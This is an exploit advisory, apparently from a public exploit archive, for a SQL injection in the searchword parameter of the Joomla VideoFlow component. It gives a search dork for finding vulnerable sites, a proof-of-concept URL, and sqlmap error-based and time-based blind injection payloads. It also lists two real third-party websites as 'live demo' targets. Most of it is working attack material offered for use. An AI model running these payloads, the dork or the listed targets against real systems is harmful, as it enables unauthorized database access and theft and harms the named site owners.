Joomla Video Flow 1.1.5 SQL Injection
Posted on 06 August 2016
###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/\_\____/_/ \_\____/ \____|___|_| \_\_____|_____|_| # ###################### # Exploit Title : Joomla com_videoflow SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_videoflow # Vendor Homepage : http://www.fidsoft.com # version : 1.1.3 - 1.1.5 # Tested on: [ BACK BOX] # skype:xbadgirl21 # Date: 04/08/2016 # video Proof : https://www.youtube.com/watch?v=o16dZdO-Q9U ###################### # [+] DESCRIPTION : ###################### # [+] VideoFlow is a multimedia system for Joomla! and Facebook that makes sharing multimedia content across # [+] the two platforms a breeze. Visit www.videoflow.tv for more information, support and demos. # [+] AND an SQL injection been Detected in this Joomla components videoflow after you add ['] to # [+] Vuln Target Parameter you will get error like : # [!] You have an error in your SQL syntax; check the manual that corresponds to your MySQL # [!] server version for the right syntax to use near ''' at line 1 SQL=SELECT ###################### # [+] Poc : ###################### # [searchword] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_videoflow&task=search&vs=1&searchword=1 ' ###################### # [+] SQLmap PoC: ###################### # --- #Parameter: searchword (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause # Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT 9107 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT #(ELT(9107=9107,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('fDLe'='fDLe # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (SELECT) # Payload: option=com_videoflow&task=search&vs=1&searchword=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ImsR) AND ('yKcO'='yKcO # ###################### # [!] Live Demo : ###################### # http://egyptshortcuts.com/amrmabrouk/index.php?option=com_videoflow&task=search&vs=1&searchword=1 # http://www.misitimi.gr/index.php?option=com_videoflow&task=search&vs=1&searchword=1 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################